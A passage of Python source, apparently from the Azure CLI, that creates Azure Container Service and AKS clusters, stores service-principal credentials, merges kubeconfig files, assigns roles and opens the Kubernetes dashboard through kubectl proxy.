"value": "[concat('ssh ', '{0}', '@', reference(concat('Microsoft.ContainerService/containerServices/', '{1}')).masterProfile.fqdn, ' -A -p 2200')]".format(admin_username, name) # pylint: disable=line-too-long
}
return outputs
def _generate_properties(api_version, orchestrator_type, orchestrator_version, master_pool_profile,
agent_pool_profiles, ssh_key_value, admin_username, windows_profile):
properties = {
"orchestratorProfile": {
"orchestratorType": orchestrator_type,
},
"masterProfile": master_pool_profile,
"agentPoolProfiles": agent_pool_profiles,
"linuxProfile": {
"ssh": {
"publicKeys": [
{
"keyData": ssh_key_value
}
]
},
"adminUsername": admin_username
},
}
if api_version == "2017-07-01":
properties["orchestratorProfile"]["orchestratorVersion"] = orchestrator_version
if windows_profile is not None:
properties["windowsProfile"] = windows_profile
return properties
# pylint: disable=too-many-locals
def acs_create(cmd, client, resource_group_name, deployment_name, name, ssh_key_value, dns_name_prefix=None,
location=None, admin_username="azureuser", api_version=None, master_profile=None,
master_vm_size="Standard_D2_v2", master_osdisk_size=0, master_count=1, master_vnet_subnet_id="",
master_first_consecutive_static_ip="10.240.255.5", master_storage_profile="",
agent_profiles=None, agent_vm_size="Standard_D2_v2", agent_osdisk_size=0,
agent_count=3, agent_vnet_subnet_id="", agent_ports=None, agent_storage_profile="",
orchestrator_type="DCOS", orchestrator_version="", service_principal=None, client_secret=None, tags=None,
windows=False, admin_password="", generate_ssh_keys=False, # pylint: disable=unused-argument
validate=False, no_wait=False):
"""Create a new Acs.
:param resource_group_name: The name of the resource group. The name
is case insensitive.
:type resource_group_name: str
:param deployment_name: The name of the deployment.
:type deployment_name: str
:param dns_name_prefix: Sets the Domain name prefix for the cluster.
The concatenation of the domain name and the regionalized DNS zone
make up the fully qualified domain name associated with the public
IP address.
:type dns_name_prefix: str
:param name: Resource name for the container service.
:type name: str
:param ssh_key_value: Configure all linux machines with the SSH RSA
public key string. Your key should include three parts, for example
     'ssh-rsa AAAAB...snip...UcyupgH azureuser@linuxvm'.
:type ssh_key_value: str
:param admin_username: User name for the Linux Virtual Machines.
:type admin_username: str
:param api_version: ACS API version to use
:type api_version: str
:param master_profile: MasterProfile used to describe master pool
:type master_profile: dict
:param master_vm_size: The size of master pool Virtual Machine
:type master_vm_size: str
:param master_osdisk_size: The osDisk size in GB of master pool Virtual Machine
:type master_osdisk_size: int
:param master_count: The number of masters for the cluster.
:type master_count: int
:param master_vnet_subnet_id: The vnet subnet id for master pool
:type master_vnet_subnet_id: str
:param master_storage_profile: The storage profile used for master pool.
     Possible values are StorageAccount and ManagedDisk.
:type master_storage_profile: str
:param agent_profiles: AgentPoolProfiles used to describe agent pools
:type agent_profiles: dict
:param agent_vm_size: The size of the Virtual Machine.
:type agent_vm_size: str
:param agent_osdisk_size: The osDisk size in GB of agent pool Virtual Machine
:type agent_osdisk_size: int
    :param agent_vnet_subnet_id: The vnet subnet id for agent pool
:type agent_vnet_subnet_id: str
:param agent_ports: the ports exposed on the agent pool
:type agent_ports: list
:param agent_storage_profile: The storage profile used for agent pool.
     Possible values are StorageAccount and ManagedDisk.
:type agent_storage_profile: str
:param location: Location for VM resources.
:type location: str
:param orchestrator_type: The type of orchestrator used to manage the
applications on the cluster.
:type orchestrator_type: str or :class:`orchestratorType
<Default.models.orchestratorType>`
:param tags: Tags object.
:type tags: object
:param windows: If true, the cluster will be built for running Windows container.
:type windows: bool
    :param admin_password: The administration password for Windows nodes. Only available if --windows=true
:type admin_password: str
:param bool raw: returns the direct response alongside the
deserialized response
:rtype:
:class:`AzureOperationPoller<msrestazure.azure_operation.AzureOperationPoller>`
instance that returns :class:`DeploymentExtended
<Default.models.DeploymentExtended>`
:rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
if raw=true
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
if ssh_key_value is not None and not is_valid_ssh_rsa_public_key(ssh_key_value):
raise CLIError('Provided ssh key ({}) is invalid or non-existent'.format(ssh_key_value))
subscription_id = get_subscription_id(cmd.cli_ctx)
if not dns_name_prefix:
dns_name_prefix = _get_default_dns_prefix(name, resource_group_name, subscription_id)
rg_location = _get_rg_location(cmd.cli_ctx, resource_group_name)
if location is None:
location = rg_location
# if api-version is not specified, or specified in a version not supported
# override based on location
if api_version is None or api_version not in ["2017-01-31", "2017-07-01"]:
if location in regions_in_preview:
api_version = "2017-07-01" # 2017-07-01 supported in the preview locations
else:
api_version = "2017-01-31" # 2017-01-31 applied to other locations
if orchestrator_type.lower() == 'kubernetes':
principal_obj = _ensure_service_principal(cmd.cli_ctx, service_principal, client_secret, subscription_id,
dns_name_prefix, location, name)
client_secret = principal_obj.get("client_secret")
service_principal = principal_obj.get("service_principal")
elif windows:
raise CLIError('--windows is only supported for Kubernetes clusters')
# set location if void
if not location:
location = '[resourceGroup().location]'
# set os_type
os_type = 'Linux'
if windows:
os_type = 'Windows'
# set agent_ports if void
if not agent_ports:
agent_ports = []
# get windows_profile
windows_profile = _generate_windows_profile(windows, admin_username, admin_password)
# The resources.properties fields should match with ContainerServices' api model
master_pool_profile = _generate_master_pool_profile(api_version, master_profile, master_count, dns_name_prefix,
master_vm_size, master_osdisk_size, master_vnet_subnet_id,
master_first_consecutive_static_ip, master_storage_profile)
agent_pool_profiles = _generate_agent_pool_profiles(api_version, agent_profiles, agent_count, dns_name_prefix,
agent_vm_size, os_type, agent_osdisk_size, agent_vnet_subnet_id,
agent_ports, agent_storage_profile)
outputs = _generate_outputs(name, orchestrator_type, admin_username)
properties = _generate_properties(api_version, orchestrator_type, orchestrator_version, master_pool_profile,
agent_pool_profiles, ssh_key_value, admin_username, windows_profile)
resource = {
"apiVersion": api_version,
"location": location,
"type": "Microsoft.ContainerService/containerServices",
"name": name,
"tags": tags,
"properties": properties,
}
template = {
"$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
"contentVersion": "1.0.0.0",
"resources": [
resource,
],
"outputs": outputs,
}
params = {}
if service_principal is not None and client_secret is not None:
properties["servicePrincipalProfile"] = {
"clientId": service_principal,
"secret": "[parameters('clientSecret')]",
}
template["parameters"] = {
"clientSecret": {
"type": "secureString",
"metadata": {
"description": "The client secret for the service principal"
}
}
}
params = {
"clientSecret": {
"value": client_secret
}
}
# Due to SPN replication latency, we do a few retries here
max_retry = 30
retry_exception = Exception(None)
for _ in range(0, max_retry):
try:
return _invoke_deployment(cmd.cli_ctx, resource_group_name, deployment_name,
template, params, validate, no_wait)
except CloudError as ex:
retry_exception = ex
if 'is not valid according to the validation procedure' in ex.message or \
'The credentials in ServicePrincipalProfile were invalid' in ex.message or \
'not found in Active Directory tenant' in ex.message:
time.sleep(3)
else:
raise ex
raise retry_exception
def store_acs_service_principal(subscription_id, client_secret, service_principal,
file_name='acsServicePrincipal.json'):
obj = {}
if client_secret:
obj['client_secret'] = client_secret
if service_principal:
obj['service_principal'] = service_principal
config_path = os.path.join(get_config_dir(), file_name)
full_config = load_service_principals(config_path=config_path)
if not full_config:
full_config = {}
full_config[subscription_id] = obj
with os.fdopen(os.open(config_path, os.O_RDWR | os.O_CREAT | os.O_TRUNC, 0o600),
'w+') as spFile:
json.dump(full_config, spFile)
def load_acs_service_principal(subscription_id, file_name='acsServicePrincipal.json'):
config_path = os.path.join(get_config_dir(), file_name)
config = load_service_principals(config_path)
if not config:
return None
return config.get(subscription_id)
def load_service_principals(config_path):
if not os.path.exists(config_path):
return None
fd = os.open(config_path, os.O_RDONLY)
try:
with os.fdopen(fd) as f:
return shell_safe_json_parse(f.read())
except: # pylint: disable=bare-except
return None
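# Sketch of the on-disk format (inferred from store_acs_service_principal above; the
# values shown are placeholders): acsServicePrincipal.json keeps one entry per
# subscription id, e.g.
#     {
#         "<subscription-id>": {
#             "service_principal": "<app id>",
#             "client_secret": "<secret>"
#         }
#     }
# A missing or unparsable file is treated as "no cached credentials" and returns None.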
def _invoke_deployment(cli_ctx, resource_group_name, deployment_name, template, parameters, validate, no_wait,
subscription_id=None):
from azure.cli.core.profiles import ResourceType, get_sdk
DeploymentProperties = get_sdk(cli_ctx, ResourceType.MGMT_RESOURCE_RESOURCES, 'DeploymentProperties', mod='models')
properties = DeploymentProperties(template=template, parameters=parameters, mode='incremental')
smc = get_mgmt_service_client(cli_ctx, ResourceType.MGMT_RESOURCE_RESOURCES,
subscription_id=subscription_id).deployments
if validate:
logger.info('==== BEGIN TEMPLATE ====')
logger.info(json.dumps(template, indent=2))
logger.info('==== END TEMPLATE ====')
return smc.validate(resource_group_name, deployment_name, properties)
return sdk_no_wait(no_wait, smc.create_or_update, resource_group_name, deployment_name, properties)
def k8s_get_credentials(cmd, client, name, resource_group_name,
path=os.path.join(os.path.expanduser('~'), '.kube', 'config'),
ssh_key_file=None,
overwrite_existing=False):
"""Download and install kubectl credentials from the cluster master
:param name: The name of the cluster.
:type name: str
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param path: Where to install the kubectl config file
:type path: str
:param ssh_key_file: Path to an SSH key file to use
:type ssh_key_file: str
"""
acs_info = _get_acs_info(cmd.cli_ctx, name, resource_group_name)
_k8s_get_credentials_internal(name, acs_info, path, ssh_key_file, overwrite_existing)
def _k8s_get_credentials_internal(name, acs_info, path, ssh_key_file, overwrite_existing):
if ssh_key_file is not None and not os.path.isfile(ssh_key_file):
raise CLIError('Private key file {} does not exist'.format(ssh_key_file))
dns_prefix = acs_info.master_profile.dns_prefix # pylint: disable=no-member
location = acs_info.location # pylint: disable=no-member
user = acs_info.linux_profile.admin_username # pylint: disable=no-member
_mkdir_p(os.path.dirname(path))
path_candidate = path
ix = 0
while os.path.exists(path_candidate):
ix += 1
path_candidate = '{}-{}-{}'.format(path, name, ix)
# TODO: this only works for public cloud, need other casing for national clouds
acs_client.secure_copy(user, '{}.{}.cloudapp.azure.com'.format(dns_prefix, location),
'.kube/config', path_candidate, key_filename=ssh_key_file)
# merge things
if path_candidate != path:
try:
merge_kubernetes_configurations(path, path_candidate, overwrite_existing)
except yaml.YAMLError as exc:
logger.warning('Failed to merge credentials to kube config file: %s', exc)
logger.warning('The credentials have been saved to %s', path_candidate)
def _handle_merge(existing, addition, key, replace):
if not addition.get(key, False):
return
if existing[key] is None:
existing[key] = addition[key]
return
for i in addition[key]:
for j in existing[key]:
if not i.get('name', False) or not j.get('name', False):
continue
if i['name'] == j['name']:
if replace or i == j:
existing[key].remove(j)
else:
msg = 'A different object named {} already exists in your kubeconfig file.\nOverwrite?'
overwrite = False
try:
overwrite = prompt_y_n(msg.format(i['name']))
except NoTTYException:
pass
if overwrite:
existing[key].remove(j)
else:
msg = 'A different object named {} already exists in {} in your kubeconfig file.'
raise CLIError(msg.format(i['name'], key))
existing[key].append(i)
def load_kubernetes_configuration(filename):
try:
with open(filename) as stream:
return yaml.safe_load(stream)
except (IOError, OSError) as ex:
if getattr(ex, 'errno', 0) == errno.ENOENT:
raise CLIError('{} does not exist'.format(filename))
raise
except (yaml.parser.ParserError, UnicodeDecodeError) as ex:
raise CLIError('Error parsing {} ({})'.format(filename, str(ex)))
def merge_kubernetes_configurations(existing_file, addition_file, replace, context_name=None):
existing = load_kubernetes_configuration(existing_file)
addition = load_kubernetes_configuration(addition_file)
    if addition is None:
        raise CLIError('Failed to load additional configuration from {}'.format(addition_file))
    if context_name is not None:
        addition['contexts'][0]['name'] = context_name
        addition['contexts'][0]['context']['cluster'] = context_name
        addition['clusters'][0]['name'] = context_name
        addition['current-context'] = context_name
    # rename the admin context so it doesn't overwrite the user context
    for ctx in addition.get('contexts', []):
        try:
            if ctx['context']['user'].startswith('clusterAdmin'):
                admin_name = ctx['name'] + '-admin'
                addition['current-context'] = ctx['name'] = admin_name
                break
        except (KeyError, TypeError):
            continue
if existing is None:
existing = addition
else:
_handle_merge(existing, addition, 'clusters', replace)
_handle_merge(existing, addition, 'users', replace)
_handle_merge(existing, addition, 'contexts', replace)
existing['current-context'] = addition['current-context']
# check that ~/.kube/config is only read- and writable by its owner
if platform.system() != 'Windows':
existing_file_perms = "{:o}".format(stat.S_IMODE(os.lstat(existing_file).st_mode))
if not existing_file_perms.endswith('600'):
logger.warning('%s has permissions "%s".\nIt should be readable and writable only by its owner.',
existing_file, existing_file_perms)
with open(existing_file, 'w+') as stream:
yaml.safe_dump(existing, stream, default_flow_style=False)
current_context = addition.get('current-context', 'UNKNOWN')
msg = 'Merged "{}" as current context in {}'.format(current_context, existing_file)
print(msg)
def _get_host_name(acs_info):
"""
Gets the FQDN from the acs_info object.
:param acs_info: ContainerService object from Azure REST API
:type acs_info: ContainerService
"""
if acs_info is None:
raise CLIError('Missing acs_info')
if acs_info.master_profile is None:
raise CLIError('Missing master_profile')
if acs_info.master_profile.fqdn is None:
raise CLIError('Missing fqdn')
return acs_info.master_profile.fqdn
def _get_username(acs_info):
"""
Gets the admin user name from the Linux profile of the ContainerService object.
:param acs_info: ContainerService object from Azure REST API
:type acs_info: ContainerService
"""
if acs_info.linux_profile is not None:
return acs_info.linux_profile.admin_username
return None
def _get_acs_info(cli_ctx, name, resource_group_name):
"""
Gets the ContainerService object from Azure REST API.
:param name: ACS resource name
:type name: String
:param resource_group_name: Resource group name
:type resource_group_name: String
"""
container_services = cf_container_services(cli_ctx, None)
return container_services.get(resource_group_name, name)
def _rand_str(n):
"""
Gets a random string
"""
choices = string.ascii_lowercase + string.digits
return ''.join(random.SystemRandom().choice(choices) for _ in range(n))
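# Illustrative usage (not part of the original source): output is lowercase alphanumeric
# and non-deterministic, e.g. _rand_str(6) might return 'a3k9x2'. random.SystemRandom
# draws from the OS entropy source, so the value is suitable for generated names and secrets.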
def _mkdir_p(path):
# http://stackoverflow.com/a/600612
try:
os.makedirs(path)
except OSError as exc: # Python >2.5
if exc.errno == errno.EEXIST and os.path.isdir(path):
pass
else:
raise
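# Note (assumption, not from the original source): on Python 3 this helper is roughly
# equivalent to os.makedirs(path, exist_ok=True); the explicit errno check mirrors the
# Stack Overflow answer linked above and also covers older interpreters.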
def update_acs(cmd, client, resource_group_name, container_service_name, new_agent_count):
instance = client.get(resource_group_name, container_service_name)
instance.agent_pool_profiles[0].count = new_agent_count # pylint: disable=no-member
# null out the service principal because otherwise validation complains
if instance.orchestrator_profile.orchestrator_type == ContainerServiceOrchestratorTypes.kubernetes:
instance.service_principal_profile = None
# null out the windows profile so that validation doesn't complain about not having the admin password
instance.windows_profile = None
return client.create_or_update(resource_group_name, container_service_name, instance)
def list_container_services(cmd, client, resource_group_name=None):
''' List Container Services. '''
svc_list = client.list_by_resource_group(resource_group_name=resource_group_name) \
if resource_group_name else client.list()
return list(svc_list)
def show_service_principal(client, identifier):
object_id = _resolve_service_principal(client, identifier)
return client.get(object_id)
def _resolve_service_principal(client, identifier):
# todo: confirm with graph team that a service principal name must be unique
result = list(client.list(filter="servicePrincipalNames/any(c:c eq '{}')".format(identifier)))
if result:
return result[0].object_id
try:
uuid.UUID(identifier)
return identifier # assume an object id
except ValueError:
raise CLIError("service principal '{}' doesn't exist".format(identifier))
def create_application(client, display_name, homepage, identifier_uris,
available_to_other_tenants=False, password=None, reply_urls=None,
key_value=None, key_type=None, key_usage=None, start_date=None,
end_date=None, required_resource_accesses=None):
from azure.graphrbac.models import GraphErrorException
password_creds, key_creds = _build_application_creds(password, key_value, key_type,
key_usage, start_date, end_date)
app_create_param = ApplicationCreateParameters(available_to_other_tenants=available_to_other_tenants,
display_name=display_name,
identifier_uris=identifier_uris,
homepage=homepage,
reply_urls=reply_urls,
key_credentials=key_creds,
password_credentials=password_creds,
required_resource_access=required_resource_accesses)
try:
result = client.create(app_create_param, raw=True)
return result.output, result.response.headers["ocp-aad-session-key"]
except GraphErrorException as ex:
if 'insufficient privileges' in str(ex).lower():
link = 'https://docs.microsoft.com/azure/azure-resource-manager/resource-group-create-service-principal-portal' # pylint: disable=line-too-long
raise CLIError("Directory permission is needed for the current user to register the application. "
"For how to configure, please refer '{}'. Original error: {}".format(link, ex))
raise
def update_application(client, object_id, display_name, homepage, identifier_uris,
available_to_other_tenants=False, password=None, reply_urls=None,
key_value=None, key_type=None, key_usage=None, start_date=None,
end_date=None, required_resource_accesses=None):
from azure.graphrbac.models import GraphErrorException
password_creds, key_creds = _build_application_creds(password, key_value, key_type,
key_usage, start_date, end_date)
try:
if key_creds:
client.update_key_credentials(object_id, key_creds)
if password_creds:
client.update_password_credentials(object_id, password_creds)
if reply_urls:
client.patch(object_id, ApplicationUpdateParameters(reply_urls=reply_urls))
return
except GraphErrorException as ex:
if 'insufficient privileges' in str(ex).lower():
link = 'https://docs.microsoft.com/azure/azure-resource-manager/resource-group-create-service-principal-portal' # pylint: disable=line-too-long
raise CLIError("Directory permission is needed for the current user to register the application. "
"For how to configure, please refer '{}'. Original error: {}".format(link, ex))
raise
def _build_application_creds(password=None, key_value=None, key_type=None,
key_usage=None, start_date=None, end_date=None):
if password and key_value:
raise CLIError('specify either --password or --key-value, but not both.')
if not start_date:
start_date = datetime.datetime.utcnow()
elif isinstance(start_date, str):
start_date = dateutil.parser.parse(start_date)
if not end_date:
end_date = start_date + relativedelta(years=1)
elif isinstance(end_date, str):
end_date = dateutil.parser.parse(end_date)
key_type = key_type or 'AsymmetricX509Cert'
key_usage = key_usage or 'Verify'
password_creds = None
key_creds = None
if password:
password_creds = [PasswordCredential(start_date=start_date, end_date=end_date,
key_id=str(uuid.uuid4()), value=password)]
elif key_value:
key_creds = [KeyCredential(start_date=start_date, end_date=end_date, value=key_value,
key_id=str(uuid.uuid4()), usage=key_usage, type=key_type)]
return (password_creds, key_creds)
def create_service_principal(cli_ctx, identifier, resolve_app=True, rbac_client=None):
if rbac_client is None:
rbac_client = get_graph_rbac_management_client(cli_ctx)
if resolve_app:
try:
uuid.UUID(identifier)
result = list(rbac_client.applications.list(filter="appId eq '{}'".format(identifier)))
except ValueError:
result = list(rbac_client.applications.list(
filter="identifierUris/any(s:s eq '{}')".format(identifier)))
if not result: # assume we get an object id
result = [rbac_client.applications.get(identifier)]
app_id = result[0].app_id
else:
app_id = identifier
return rbac_client.service_principals.create(ServicePrincipalCreateParameters(app_id=app_id, account_enabled=True))
def create_role_assignment(cli_ctx, role, assignee, is_service_principal, resource_group_name=None, scope=None):
return _create_role_assignment(cli_ctx,
role, assignee, resource_group_name,
scope, resolve_assignee=is_service_principal)
def _create_role_assignment(cli_ctx, role, assignee,
resource_group_name=None, scope=None, resolve_assignee=True):
from azure.cli.core.profiles import ResourceType, get_sdk
factory = get_auth_management_client(cli_ctx, scope)
assignments_client = factory.role_assignments
definitions_client = factory.role_definitions
scope = _build_role_scope(resource_group_name, scope, assignments_client.config.subscription_id)
role_id = _resolve_role_id(role, scope, definitions_client)
# If the cluster has service principal resolve the service principal client id to get the object id,
# if not use MSI object id.
object_id = _resolve_object_id(cli_ctx, assignee) if resolve_assignee else assignee
RoleAssignmentCreateParameters = get_sdk(cli_ctx, ResourceType.MGMT_AUTHORIZATION,
'RoleAssignmentCreateParameters', mod='models',
operation_group='role_assignments')
parameters = RoleAssignmentCreateParameters(role_definition_id=role_id, principal_id=object_id)
assignment_name = uuid.uuid4()
custom_headers = None
return assignments_client.create(scope, assignment_name, parameters, custom_headers=custom_headers)
def _build_role_scope(resource_group_name, scope, subscription_id):
subscription_scope = '/subscriptions/' + subscription_id
if scope:
if resource_group_name:
err = 'Resource group "{}" is redundant because scope is supplied'
raise CLIError(err.format(resource_group_name))
elif resource_group_name:
scope = subscription_scope + '/resourceGroups/' + resource_group_name
else:
scope = subscription_scope
return scope
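# Illustrative usage (sketch, not part of the original module):
#     >>> _build_role_scope(None, None, '00000000-0000-0000-0000-000000000000')
#     '/subscriptions/00000000-0000-0000-0000-000000000000'
#     >>> _build_role_scope('my-rg', None, '00000000-0000-0000-0000-000000000000')
#     '/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/my-rg'
# Passing both a resource group and an explicit scope raises CLIError.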
def _resolve_role_id(role, scope, definitions_client):
role_id = None
try:
uuid.UUID(role)
role_id = role
except ValueError:
pass
if not role_id: # retrieve role id
role_defs = list(definitions_client.list(scope, "roleName eq '{}'".format(role)))
if not role_defs:
raise CLIError("Role '{}' doesn't exist.".format(role))
if len(role_defs) > 1:
ids = [r.id for r in role_defs]
err = "More than one role matches the given name '{}'. Please pick a value from '{}'"
raise CLIError(err.format(role, ids))
role_id = role_defs[0].id
return role_id
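# Note added for clarity (illustrative, not part of the original source): a role passed
# as a GUID is used as-is; otherwise it is resolved by display name at the given scope,
# e.g. 'Network Contributor' resolves to the full role definition resource id (ending in
# .../providers/Microsoft.Authorization/roleDefinitions/<guid>).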
def _resolve_object_id(cli_ctx, assignee):
client = get_graph_rbac_management_client(cli_ctx)
result = None
if assignee.find('@') >= 0: # looks like a user principal name
result = list(client.users.list(filter="userPrincipalName eq '{}'".format(assignee)))
if not result:
result = list(client.service_principals.list(
filter="servicePrincipalNames/any(c:c eq '{}')".format(assignee)))
if not result: # assume an object id, let us verify it
result = _get_object_stubs(client, [assignee])
# 2+ matches should never happen, so we only check 'no match' here
if not result:
raise CLIError("No matches in graph database for '{}'".format(assignee))
return result[0].object_id
def _get_object_stubs(graph_client, assignees):
params = GetObjectsParameters(include_directory_object_references=True,
object_ids=assignees)
return list(graph_client.objects.get_objects_by_object_ids(params))
def _update_dict(dict1, dict2):
cp = dict1.copy()
cp.update(dict2)
return cp
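# Illustrative usage (sketch, not part of the original module): a shallow merge where
# dict2 wins on key collisions and neither input is mutated:
#     >>> _update_dict({'count': 3, 'vmSize': 'Standard_D2_v2'}, {'count': 5})
#     {'count': 5, 'vmSize': 'Standard_D2_v2'}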
def subnet_role_assignment_exists(cli_ctx, scope):
network_contributor_role_id = "4d97b98b-1d4f-4787-a291-c67834d212e7"
factory = get_auth_management_client(cli_ctx, scope)
assignments_client = factory.role_assignments
for i in assignments_client.list_for_scope(scope=scope, filter='atScope()'):
if i.scope == scope and i.role_definition_id.endswith(network_contributor_role_id):
return True
return False
# pylint: disable=too-many-statements
def aks_browse(cmd, client, resource_group_name, name, disable_browser=False,
listen_address='127.0.0.1', listen_port='8001'):
if not which('kubectl'):
        raise CLIError('Cannot find kubectl executable in PATH')
# verify the kube-dashboard addon was not disabled
instance = client.get(resource_group_name, name)
addon_profiles = instance.addon_profiles or {}
addon_profile = addon_profiles.get("kubeDashboard", ManagedClusterAddonProfile(enabled=True))
if not addon_profile.enabled:
raise CLIError('The kube-dashboard addon was disabled for this managed cluster.\n'
'To use "az aks browse" first enable the add-on\n'
'by running "az aks enable-addons --addons kube-dashboard".')
_, browse_path = tempfile.mkstemp()
aks_get_credentials(cmd, client, resource_group_name, name, admin=False, path=browse_path)
# find the dashboard pod's name
try:
dashboard_pod = subprocess.check_output(
["kubectl", "get", "pods", "--kubeconfig", browse_path, "--namespace", "kube-system",
"--output", "name", "--selector", "k8s-app=kubernetes-dashboard"],
universal_newlines=True)
except subprocess.CalledProcessError as err:
raise CLIError('Could not find dashboard pod: {}'.format(err))
if dashboard_pod:
# remove any "pods/" or "pod/" prefix from the name
dashboard_pod = str(dashboard_pod).split('/')[-1].strip()
else:
raise CLIError("Couldn't find the Kubernetes dashboard pod.")
# find the port
try:
dashboard_port = subprocess.check_output(
["kubectl", "get", "pods", "--kubeconfig", browse_path, "--namespace", "kube-system",
"--selector", "k8s-app=kubernetes-dashboard",
"--output", "jsonpath='{.items[0].spec.containers[0].ports[0].containerPort}'"]
)
# output format: b"'{port}'"
dashboard_port = int((dashboard_port.decode('utf-8').replace("'", "")))
except subprocess.CalledProcessError as err:
raise CLIError('Could not find dashboard port: {}'.format(err))
# use https if dashboard container is using https
if dashboard_port == 8443:
protocol = 'https'
else:
protocol = 'http'
proxy_url = 'http://{0}:{1}/'.format(listen_address, listen_port)
dashboardURL = '{0}/api/v1/namespaces/kube-system/services/{1}:kubernetes-dashboard:/proxy/'.format(proxy_url,
protocol)
# launch kubectl port-forward locally to access the remote dashboard
if in_cloud_console():
# TODO: better error handling here.
response = requests.post('http://localhost:8888/openport/{0}'.format(listen_port))
result = json.loads(response.text)
dashboardURL = '{0}api/v1/namespaces/kube-system/services/{1}:kubernetes-dashboard:/proxy/'.format(
result['url'], protocol)
term_id = os.environ.get('ACC_TERM_ID')
if term_id:
response = requests.post('http://localhost:8888/openLink/{0}'.format(term_id),
json={"url": dashboardURL})
logger.warning('To view the console, please open %s in a new tab', dashboardURL)
else:
logger.warning('Proxy running on %s', proxy_url)
logger.warning('Press CTRL+C to close the tunnel...')
if not disable_browser:
wait_then_open_async(dashboardURL)
try:
try:
subprocess.check_output(["kubectl", "--kubeconfig", browse_path, "proxy", "--address",
listen_address, "--port", listen_port], stderr=subprocess.STDOUT)
except subprocess.CalledProcessError as err:
            if b'unknown flag: --address' in err.output:
if listen_address != '127.0.0.1':
logger.warning('"--address" is only supported in kubectl v1.13 and later.')
logger.warning('The "--listen-address" argument will be ignored.')
subprocess.call(["kubectl", "--kubeconfig", browse_path, "proxy", "--port", listen_port])
except KeyboardInterrupt:
# Let command processing finish gracefully after the user presses [Ctrl+C]
pass
finally:
if in_cloud_console():
            requests.post('http://localhost:8888/closeport/{0}'.format(listen_port))
def _trim_nodepoolname(nodepool_name):
if not nodepool_name:
return "nodepool1"
return nodepool_name[:12]
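# Illustrative usage (sketch, not part of the original module):
#     >>> _trim_nodepoolname('')
#     'nodepool1'
#     >>> _trim_nodepoolname('averylongnodepoolname')
#     'averylongnod'
# The 12-character cap leaves room for the suffix the ACS RP appends (see the agent pool
# profile comment in aks_create).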
def _validate_ssh_key(no_ssh_key, ssh_key_value):
if not no_ssh_key:
try:
if not ssh_key_value or not is_valid_ssh_rsa_public_key(ssh_key_value):
raise ValueError()
except (TypeError, ValueError):
shortened_key = truncate_text(ssh_key_value)
raise CLIError('Provided ssh key ({}) is invalid or non-existent'.format(shortened_key))
def _add_monitoring_role_assignment(result, cluster_resource_id, cmd):
service_principal_msi_id = None
# Check if service principal exists, if it does, assign permissions to service principal
# Else, provide permissions to MSI
if (
hasattr(result, 'service_principal_profile') and
hasattr(result.service_principal_profile, 'client_id') and
result.service_principal_profile.client_id.lower() != 'msi'
):
logger.info('valid service principal exists, using it')
service_principal_msi_id = result.service_principal_profile.client_id
is_service_principal = True
elif (
(hasattr(result, 'addon_profiles')) and
('omsagent' in result.addon_profiles) and
(hasattr(result.addon_profiles['omsagent'], 'identity')) and
(hasattr(result.addon_profiles['omsagent'].identity, 'object_id'))
):
logger.info('omsagent MSI exists, using it')
service_principal_msi_id = result.addon_profiles['omsagent'].identity.object_id
is_service_principal = False
if service_principal_msi_id is not None:
if not _add_role_assignment(cmd.cli_ctx, 'Monitoring Metrics Publisher',
service_principal_msi_id, is_service_principal, scope=cluster_resource_id):
logger.warning('Could not create a role assignment for Monitoring addon. '
'Are you an Owner on this subscription?')
else:
        logger.warning('Could not find service principal or user assigned MSI for role '
                       'assignment')
# pylint: disable=too-many-statements,too-many-branches
def aks_create(cmd, client, resource_group_name, name, ssh_key_value, # pylint: disable=too-many-locals
dns_name_prefix=None,
location=None,
admin_username="azureuser",
windows_admin_username=None,
windows_admin_password=None,
kubernetes_version='',
node_vm_size="Standard_D2s_v3",
node_osdisk_size=0,
node_count=3,
nodepool_name="nodepool1",
nodepool_tags=None,
nodepool_labels=None,
service_principal=None, client_secret=None,
no_ssh_key=False,
disable_rbac=None,
enable_rbac=None,
vm_set_type=None,
skip_subnet_role_assignment=False,
enable_cluster_autoscaler=False,
network_plugin=None,
network_policy=None,
uptime_sla=False,
pod_cidr=None,
service_cidr=None,
dns_service_ip=None,
docker_bridge_address=None,
load_balancer_sku=None,
load_balancer_managed_outbound_ip_count=None,
load_balancer_outbound_ips=None,
load_balancer_outbound_ip_prefixes=None,
load_balancer_outbound_ports=None,
load_balancer_idle_timeout=None,
outbound_type=None,
enable_addons=None,
workspace_resource_id=None,
vnet_subnet_id=None,
max_pods=0,
min_count=None,
max_count=None,
aad_client_app_id=None,
aad_server_app_id=None,
aad_server_app_secret=None,
aad_tenant_id=None,
tags=None,
zones=None,
enable_node_public_ip=False,
generate_ssh_keys=False, # pylint: disable=unused-argument
api_server_authorized_ip_ranges=None,
enable_private_cluster=False,
enable_managed_identity=False,
attach_acr=None,
no_wait=False):
_validate_ssh_key(no_ssh_key, ssh_key_value)
subscription_id = get_subscription_id(cmd.cli_ctx)
if not dns_name_prefix:
dns_name_prefix = _get_default_dns_prefix(name, resource_group_name, subscription_id)
rg_location = _get_rg_location(cmd.cli_ctx, resource_group_name)
if location is None:
location = rg_location
vm_set_type = _set_vm_set_type(vm_set_type, kubernetes_version)
load_balancer_sku = set_load_balancer_sku(load_balancer_sku, kubernetes_version)
if api_server_authorized_ip_ranges and load_balancer_sku == "basic":
raise CLIError('--api-server-authorized-ip-ranges can only be used with standard load balancer')
agent_pool_profile = ManagedClusterAgentPoolProfile(
name=_trim_nodepoolname(nodepool_name), # Must be 12 chars or less before ACS RP adds to it
tags=nodepool_tags,
node_labels=nodepool_labels,
count=int(node_count),
vm_size=node_vm_size,
os_type="Linux",
storage_profile=ContainerServiceStorageProfileTypes.managed_disks,
vnet_subnet_id=vnet_subnet_id,
availability_zones=zones,
enable_node_public_ip=enable_node_public_ip,
max_pods=int(max_pods) if max_pods else None,
type=vm_set_type,
mode="System"
)
if node_osdisk_size:
agent_pool_profile.os_disk_size_gb = int(node_osdisk_size)
_check_cluster_autoscaler_flag(enable_cluster_autoscaler, min_count, max_count, node_count, agent_pool_profile)
linux_profile = None
# LinuxProfile is just used for SSH access to VMs, so omit it if --no-ssh-key was specified.
if not no_ssh_key:
ssh_config = ContainerServiceSshConfiguration(
public_keys=[ContainerServiceSshPublicKey(key_data=ssh_key_value)])
linux_profile = ContainerServiceLinuxProfile(admin_username=admin_username, ssh=ssh_config)
windows_profile = None
